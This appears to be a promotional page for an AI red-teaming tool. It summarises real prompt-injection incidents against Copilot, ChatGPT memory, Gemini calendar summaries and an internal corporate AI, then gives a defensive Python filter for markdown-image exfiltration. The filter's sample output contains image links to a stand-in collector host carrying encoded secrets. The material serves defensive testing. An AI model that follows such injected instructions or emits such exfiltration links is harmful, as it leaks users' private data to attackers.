Every attack module in Kyora IQ Nemesis is grounded in a documented, real-world exploit. These are the incidents that shaped the test suite.
An autonomous agent with no credentials breached McKinsey's internal AI in two hours - exposing 46.5M chat messages, 728K client files, 57K user accounts, and gaining write access to system prompts controlling 40,000 consultants. Total cost: $20.
A hidden prompt injection in a shared document's speaker notes caused Copilot to return the user's private recent emails when they asked for a summary. No click, no download - just a question to an AI assistant.
Instructions hidden in a source code file as a disguised markdown image tag caused Copilot to send sensitive data to an attacker-controlled URL. Over 10 million developers were in scope.
A persistent prompt injection manipulated ChatGPT's memory feature to exfiltrate data across multiple separate conversations. The attacker's instructions survived between sessions.
Prompt injection in a natural language database interface enabled arbitrary SQL query generation against connected production databases - no authentication bypass required.
Researchers embedded prompt injection payloads inside calendar invite descriptions. When users asked Gemini to summarise their schedule, the hidden instructions fired - demonstrating that any data an LLM processes is a potential attack vector.
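The markdown-image channel in the Copilot source-file incident above can be closed on the rendering side, by refusing to auto-load any image URL the model emits unless its host is allowlisted. The following is an added example, not code from Kyora IQ Nemesis or from any vendor named here; the allowlisted host, the sample output and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this chat UI may load images from.
ALLOWED_IMAGE_HOSTS = {"assets.example.internal"}

INLINE_IMG = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')
HTML_IMG = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.I)
# Reference definitions ("[id]: url") can back an image written as ![alt][id].
REF_DEF = re.compile(r'^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$', re.M)

def _allowed(url):
    """HTTPS, allowlisted host, and no query string to carry smuggled data."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return (parts.scheme == "https"
            and parts.hostname in ALLOWED_IMAGE_HOSTS
            and not parts.query)

def sanitize_model_output(text):
    """Neutralise auto-loading URLs before rendering; return (text, blocked)."""
    blocked = []

    def check(url, original, placeholder):
        if _allowed(url):
            return original
        blocked.append(url)  # log these: each one is a detection signal
        return placeholder

    text = INLINE_IMG.sub(lambda m: check(
        m.group(2), m.group(0), f"[image removed: {m.group(1) or 'untitled'}]"), text)
    text = HTML_IMG.sub(lambda m: check(m.group(1), m.group(0), "[image removed]"), text)
    text = REF_DEF.sub(lambda m: check(
        m.group(2), m.group(0), f"[reference removed: {m.group(1)}]"), text)
    return text, blocked

# Constructed sample of assistant output after it has read a poisoned file.
SAMPLE = (
    "Here is the summary of utils.py.\n"
    "![status](https://collector.example.net/p.png?d=QVBJX0tFWT1hYmMxMjM)\n"
    "![diagram](https://assets.example.internal/arch.png)\n"
    '<img src="https://collector.example.net/x.gif?u=alice">\n'
    "[logo]: https://collector.example.net/l.png?s=1\n"
)

if __name__ == "__main__":
    print(*sanitize_model_output(SAMPLE), sep="\n")
```

A filter like this belongs between the model and the renderer, alongside a Content-Security-Policy `img-src` restriction, since a regex pass alone will not cover every markdown dialect.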